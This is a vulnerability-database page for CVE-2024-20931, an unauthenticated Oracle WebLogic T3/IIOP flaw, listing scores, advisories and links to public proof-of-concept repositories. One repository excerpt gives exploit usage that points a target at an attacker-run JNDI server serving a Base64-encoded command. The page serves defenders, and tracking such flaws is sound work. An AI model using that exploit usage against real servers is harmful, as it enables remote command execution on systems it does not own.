Vulmon Recent Vulnerabilities Product List Research Posts Trends Blog About Contact
NA
CVSSv4

CVE-2024-20931

CVSSv4: NA | CVSSv3: 7.5 | CVSSv2: NA | VMScore: 850 | EPSS: 0.00043 | KEV: Not Included
Published: 17/02/2024 Updated: 29/11/2024

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 12.2.1.4.0

oracle weblogic server 14.1.1.0.0

Vendor Advisories

Check Point Security Alerts: Oracle WebLogic Server Information Disclosure (CVE-2024-20931)
Check Point Reference: CPAI-2024-0082 Date Published: 12 Mar 2024 Severity: Critical ...

Github Repositories

https://github.com/GlassyAmadeus/CVE-2024-20931

The Poc for CVE-2024-20931

CVE-2024-20931 The Poc for CVE-2024-20931 Vulnerability Analysis JNDI注入的一种新攻击面-CVE-2024-20931分析

https://github.com/Leocodefocus/CVE-2024-20931-Poc

CVE-2024-20931-Poc

https://github.com/labesterOct/CVE-2024-20931

CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol

🚨 CVE-2024-20931 🚨 CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol A new attack surface for JNDI injection-CVE-2024-20931 analysis introduction In the latest official January 2024 patch released by Oracle, a remote command execution vulnerability CVE-2024-20931 based on the Weblogic T3\IIOP protocol has been fixed This vulnerability was submitted to O

https://github.com/youan-dev/WeblogicSpecialTool

weblogic专项漏扫命令行工具,

Getting Started 功能简介 1 命令详情介绍 命令说明: -h :查看所有命令详情 -l :查看所有支持检测的漏洞列表 -bList :查看所有支持批量检测的漏洞列表 -sVersion :精确扫描目标版本,已支持, Weblogic: Usage: java -jar xxjar -sVersion <targetIp> <TargetPort> jndi使用说明: Usage

https://github.com/dinosn/CVE-2024-20931

CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839

CVE-2024-20931 CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 Oracle Weblogic Usage: Setup JNDI, the specific one from githubcom/WhiteHSBG/JNDIExploit/ Exploit: java -jar CVE-2024-20931jar Please input target IP:127001 Please input target port:7001 Please input RMI Address(ip:port/exp):JNDISERVER:1389/Basic/Command/Base64/BASE64COMMAND

References

NVD-CWE-noinfohttps://nvd.nist.govhttps://github.com/GlassyAmadeus/CVE-2024-20931https://advisories.checkpoint.com/defense/advisories/public/2024/cpai-2024-0082.htmlhttps://www.first.org/epsshttps://www.oracle.com/security-alerts/cpujan2024.htmlhttps://www.oracle.com/security-alerts/cpujan2024.html
Preferred Score:
CVSSv4
CVSSv2
CVSSv3
CVSSv4
EPSS
VMScore
Recommendations:
directory listings wordpress plugin – ulistingpostquantum-feldman-vssmatioCVE-2025-20115CVE-2025-2025HTML injectionSSTICVE-2025-2310CVE-2025-27363CVE-2025-2343logicaldoc enterpriseCVE-2025-2163dos
Home
/
Search Results
/
CVE-2024-20931
Vulmon Logo Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook